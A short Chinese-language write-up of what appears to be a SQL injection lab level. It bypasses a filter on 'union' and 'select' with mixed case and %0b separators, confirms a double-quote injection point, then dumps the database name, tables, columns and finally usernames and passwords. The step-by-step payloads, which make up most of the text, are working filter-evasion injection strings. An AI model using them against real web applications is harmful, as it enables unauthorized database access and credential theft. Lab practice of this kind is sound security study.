欢迎界面提示我们union和select被过滤了 我们使用大小写过滤操作
首先判断注入点是否为数字型
输入如下
id=1%0band%0b1=2
回显如下
说明属于字符型
然后判断一下是属于单引还是双引
输入1' 正确回显 说明只能是双引号 输入一下1" 果然报错 作证一下 输入1"%0bor%0b"1"="1
爆对了 说明就是属于双引号注入
来吧 使用一把联合注入
首先判断一下回显点 输入如下
id=0"%0bunioN%0bselecT%0b1,2,3%0bor%0b"1"="1
回显如下
多判断几次 最终发现只有username一处可以出现回显
然后爆库 输入如下
id=0"%0bunioN%0bselecT%0b1,database(),3%0bor"1"="1
回显如下
爆表 输入如下
id=0"%0bunioN%0bselecT%0b1,group_concat(table_name),3%0bfrom%0binformation_schema.tables%0bwhere%0btable_schema=database()%0band%0b"1"="1
回显如下
爆字段 输入如下
id=0"%0bunioN%0bselecT%0b1,group_concat(column_name),3%0bfrom%0binformation_schema.columns%0bwhere%0btable_name='users'%0band%0btable_schema=database()%0band%0b"1"="1
回显如下
爆用户名和密码相关信息 输入如下
id=0"%0bunioN%0bselecT%0b1,group_concat(username,password),3%0bfrom%0busers%0bwhere%0b"1"="1
回显如下
也是顺利过关 嗨嗨!!